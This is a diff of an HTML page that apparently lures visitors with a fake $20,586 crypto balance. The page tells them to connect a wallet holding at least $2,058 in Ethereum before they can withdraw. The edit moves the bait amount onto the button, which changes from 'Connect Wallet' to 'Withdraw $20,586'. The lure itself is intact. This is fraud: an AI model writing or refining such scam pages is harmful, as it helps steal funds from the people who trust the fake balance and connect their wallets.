--- a/index.html
+++ b/index.html
@@ -107,9 +107,9 @@
                     </span>
                 </div>
                 <div class="Home_content__WcTpR">
-                    <div class="Home_desc__q_6Ri">Connect your wallet to withdraw your balance of $20,586. Ensure there's a minimum Ethereum balance of 10% of amount to be withdrawn ($2,058) present in your wallet before initiating withdrawal of balance.<br><br>
+                    <div class="Home_desc__q_6Ri">Connect your wallet to withdraw your balance. Ensure there's a minimum Ethereum balance of 10% of amount to be withdrawn ($2,058) present in your wallet before initiating withdrawal of balance.<br><br>
                     <div class="Home_soon__8s2ww">
-                        <button class="connectButton">Connect Wallet</button><button class="connectButton" style="display: none;">Connect Wallet</button>
+                        <button class="connectButton">Withdraw $20,586</button><button class="connectButton" style="display: none;">Withdraw $20,586</button>
                         <br />
                     </div>
                     
